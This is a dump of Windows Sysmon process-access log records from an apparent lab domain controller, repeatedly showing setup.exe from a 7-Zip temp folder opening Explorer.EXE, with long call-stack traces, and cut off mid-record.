13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.d